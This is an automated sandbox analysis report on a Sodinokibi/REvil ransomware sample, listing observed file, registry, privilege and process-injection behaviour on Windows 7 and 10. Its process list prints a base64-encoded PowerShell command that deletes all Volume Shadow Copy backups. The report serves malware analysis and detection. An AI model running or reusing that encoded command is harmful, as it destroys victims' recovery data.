Analysis Overview
SHA256
c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390
Threat Level: Known bad
The file c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390 was found to be: Known bad.
Malicious Activity Summary
Sodinokibi family
Sodinokibi/Revil sample
Enumerates connected drives
Drops file in Windows directory
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-24 01:08
Signatures
Sodinokibi family
Sodinokibi/Revil sample
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-24 01:08
Reported
2022-01-24 01:25
Platform
win7-en-20211208
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Enumerates connected drives
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-newdev_31bf3856ad364e35_6.1.7600.16385_none_114ca177b1fcad24_newdev.dll_7eb7622f | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-a..structure.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_f6a00d30a34ae11a_sdbinst.exe.mui_258ad624 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4bf9d57947dd35b9_gpapi.dll.mui_ef0a9748 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-profsvc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c2b105891e24eb61_profsvc.dll.mui_32482e9e | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasrtutils_31bf3856ad364e35_6.1.7601.17514_none_6b3b9980011a19de_rtutils.dll_243724ab | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-crypt32-dll.resources_31bf3856ad364e35_6.1.7600.16385_de-de_250c5db92cbbfe4b_crypt32.dll.mui_4268f86a | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-comdlg32.resources_31bf3856ad364e35_6.1.7601.17514_zh-cn_4c840294b551dbf9_comdlg32.dll.mui_ac8e62f4 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-dui70.resources_31bf3856ad364e35_6.1.7600.16385_en-us_619e13eec4db6369_dui70.dll.mui_de5f27e2 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-m..ditevtlog.resources_31bf3856ad364e35_6.1.7600.16385_es-es_59a756fabb56ede3.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_6.1.7600.16385_cs-cz_97769b281ba398b8_bootmgr.efi.mui_be5d0075 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1cf4ea268abe27fe_gpsvc.dll.mui_0c160ac2 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..pp-client.resources_31bf3856ad364e35_6.1.7600.16385_de-de_ec4e337f0ce0896b_slc.dll.mui_dc24f809 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-webio.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_8c6fe68c0c8fba1a_webio.dll.mui_e805c4b7 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_6.1.7600.16385_en-us_30bc7fe1e159c5d3.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_pl-pl_856144d7e24caf0a.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_961efb4172b82af7_scarddlg.dll.mui_300ae9df | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-oem_31bf3856ad364e35_6.1.7600.16385_none_59590e92c817a4e0_s8514oem.fon_304f98b5 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-i..tional-codepage-936_31bf3856ad364e35_6.1.7600.16385_none_2acfd536b4ed2a23.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-p..structure.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_65c533f1c582e47c_perfi.dat_e3a35ecf | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasserver_31bf3856ad364e35_6.1.7601.17514_none_09cf3ec67e6c6b50_rasservermigplugin-dl.man_babd2d8e | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\wow64_microsoft-windows-appid.resources_31bf3856ad364e35_6.1.7600.16385_en-us_9c7424fcfaec8d6b.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_6.1.7601.17514_tr-tr_d752a669f3ec89fa_msimsg.dll.mui_72e8994f | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-u..erservice.resources_31bf3856ad364e35_6.1.7600.16385_en-us_f09dccd4f32812c2.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-i..tional-codepage-775_31bf3856ad364e35_6.1.7600.16385_none_2ae98cfeb4d93dfc.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-m..ents-mdac.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_5c8a8ee4f97b7f12.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-shell32.resources_31bf3856ad364e35_6.1.7601.17514_es-es_b79b28ecefa21fda.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_6.1.7601.17514_es-es_32b8f08dde6f3b12_ncprov.dll.mui_40240de1 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_6.1.7600.16385_zh-tw_82dac7a36bd74688.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-truetype-raavi_31bf3856ad364e35_6.1.7600.16385_none_a2d43ed8e3097243.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-w..-encoding.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c49975d6cf9550ff.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-a..llservice.resources_31bf3856ad364e35_6.1.7600.16385_de-de_10d22dcfce04430a.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-appid.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_34a24d8db984d377_appidsvc.dll.mui_6717e231 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-comctl32-v5.resources_31bf3856ad364e35_6.1.7600.16385_lv-lv_359174e350f0ded0_comctl32.dll.mui_0da4e682 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-dfsclient_31bf3856ad364e35_6.1.7601.17514_none_e5c0334cfcbb6f1f.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-fixed_31bf3856ad364e35_6.1.7600.16385_none_db04d3f548508fd9_h8514fix.fon_9a1c84fa | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_6.1.7600.16385_none_70644a8bdb0d9303_ega80737.fon_604f84b5 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-fms_31bf3856ad364e35_6.1.7601.17514_none_a5f8bb0ccaefbe07.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-newdev.resources_31bf3856ad364e35_6.1.7600.16385_en-us_cf00a033363ace4b.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-keyiso.resources_31bf3856ad364e35_6.1.7600.16385_de-de_6170816be6863ccb_keyiso.dll.mui_4bbf12ff | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_hr-hr_6ed8265c4c3dbb0a.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-d2d_31bf3856ad364e35_7.1.7601.16492_none_f6dafd66fdb9c254.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_6.1.7600.16385_pt-pt_21d625cff367fd81.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-d..lient-dll.resources_31bf3856ad364e35_6.1.7601.17514_en-us_57ee6a4218527f7e_dhcpcore6.dll.mui_27872349 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_tr-tr_14424567ab0c4d42_mlang.dll.mui_2904864a | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-p..ndprintui.resources_31bf3856ad364e35_6.1.7600.16385_es-es_d2945884bb037beb.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-comdlg32.resources_31bf3856ad364e35_6.1.7601.17514_bg-bg_5abc71b3b20b3a94.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-commonlog.resources_31bf3856ad364e35_6.1.7600.16385_es-es_6e1909b6145934ca.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-e..rtingcore.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_8dd8c4f40dc38dd9_wer.dll.mui_e68ddae7 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\wow64_microsoft-windows-kernelbase.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_80e9298bf792ff3e.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-wintrust-dll_31bf3856ad364e35_6.1.7601.17514_none_f1b5a3b0f852fe0e_wintrust.dll_abec426a | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-x..nrollment.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_d84bdc3098a2df3d_certenrollctrl.exe.mui_3b48c5a6 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-errorreportingcore_31bf3856ad364e35_6.1.7601.17514_none_227e1c01642654f4_werdiagcontroller.dll_208f2db3 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_de-de_299cd5b40ed6d155_winresume.exe.mui_ff8b5358 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-d..owmanager.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_34be759892c77101_dwmcore.dll.mui_ebf60d96 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-duser.resources_31bf3856ad364e35_6.1.7600.16385_de-de_283494514da2fa34_duser.dll.mui_3c369ac4 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-lddmcore_31bf3856ad364e35_6.1.7601.17514_none_09ee9e0dfa2c4fbd_dxgmms1.sys_9c98a5d4 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-session0viewer_31bf3856ad364e35_6.1.7600.16385_none_3ddbd9a9605f0519_ui0detect.exe_639495e3 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\x86_microsoft-windows-mfc42x.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_64fae1eae3516fc5_mfc42.dll.mui_66106d85 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-commonlog_31bf3856ad364e35_6.1.7600.16385_none_da778c54413d0c9c.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-f..ruetype-new_tai_lue_31bf3856ad364e35_6.1.7600.16385_none_325f57c8c0ee36a8_ntailu.ttf_c1891505 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-lsa_31bf3856ad364e35_6.1.7601.17514_none_04709031736ac277_lsasrv.dll_56db747f | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-rasbase_31bf3856ad364e35_6.1.7601.17514_none_6c066d50910ecf5a_netrass.inf_8745cd37 | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..resources.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_f9fce189b9d4bb7e.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| File opened for modification | C:\Windows\winsxs\Backup\amd64_microsoft-windows-comdlg32.resources_31bf3856ad364e35_6.1.7601.17514_zh-tw_ac9edb6e6b20299f.manifest | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 105ffbe4c010d801 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1540 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1540 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1540 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1540 wrote to memory of 860 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe
"C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
memory/1540-54-0x0000000075891000-0x0000000075893000-memory.dmp
memory/1540-55-0x0000000000D60000-0x0000000000E29000-memory.dmp
memory/1540-57-0x0000000002300000-0x000000000242D000-memory.dmp
memory/1540-58-0x0000000000350000-0x000000000036F000-memory.dmp
memory/1540-60-0x00000000000E0000-0x00000000000EA000-memory.dmp
memory/1540-61-0x00000000000F0000-0x00000000000F1000-memory.dmp
memory/1540-62-0x0000000000100000-0x0000000000101000-memory.dmp
memory/1540-63-0x0000000000150000-0x0000000000151000-memory.dmp
memory/1540-64-0x0000000000160000-0x0000000000166000-memory.dmp
memory/1540-59-0x0000000002610000-0x0000000002719000-memory.dmp
memory/860-65-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp
memory/860-67-0x0000000002630000-0x0000000002632000-memory.dmp
memory/860-68-0x0000000002632000-0x0000000002634000-memory.dmp
memory/860-69-0x0000000002634000-0x0000000002637000-memory.dmp
memory/860-66-0x000007FEF3460000-0x000007FEF3FBD000-memory.dmp
memory/860-70-0x000000001B790000-0x000000001BA8F000-memory.dmp
memory/860-71-0x000000000263B000-0x000000000265A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-24 01:08
Reported
2022-01-24 01:25
Platform
win10-en-20211208
Max time kernel
119s
Max time network
151s
Command Line
Signatures
Enumerates connected drives
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
